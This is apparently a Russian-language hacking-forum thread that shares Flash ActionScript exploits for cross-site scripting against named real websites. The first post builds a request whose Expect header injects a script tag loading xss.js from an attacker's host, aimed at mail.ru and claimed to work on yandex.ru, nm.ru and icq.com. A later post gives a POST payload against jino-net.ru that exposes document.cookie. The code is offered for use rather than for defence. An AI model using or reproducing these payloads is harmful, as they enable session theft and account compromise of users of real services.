Для проведения атаки я буду использовать Flash (ActionScript). Ну и естественно нам понадобится программа для создания Flash и у меня это будет Macromedia Flash MX. Создание Flash: PHP: var req:LoadVars=new LoadVars(); req.addRequestHeader("Expect","<script src=http://yourhost/xss.js></script>"); req.decode("XSS"); req.send("http://www.mail.ru","POST"); Этот ActionScript работает на IE и Firefox, в Opera просто открывается mail.ru. Уменьшаем размер и экспортируем Flash: File->Export->Export Image. Вот в принципе и все. Думаю вы знаете что дальше делать. P.S. Еще работает на yandex.ru, nm.ru и icq.com.
гыгыгы опера пелеплюнула фаерворкс =) А так метод уже рассматривался и я удивлен, почему же так редко упоминается, ведь пока что тема реально работает. оч рад +
Post Xss на jino-net.ru Так же на actionscript можно проводить xss через post запросы. Пример: XSS на jino-net.ru PHP: var req:LoadVars=new LoadVars(); req.decode("subject=spam&name=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=&message="); req.send("http://www.jino-net.ru/contacts.phtml?subj=spam","POST");
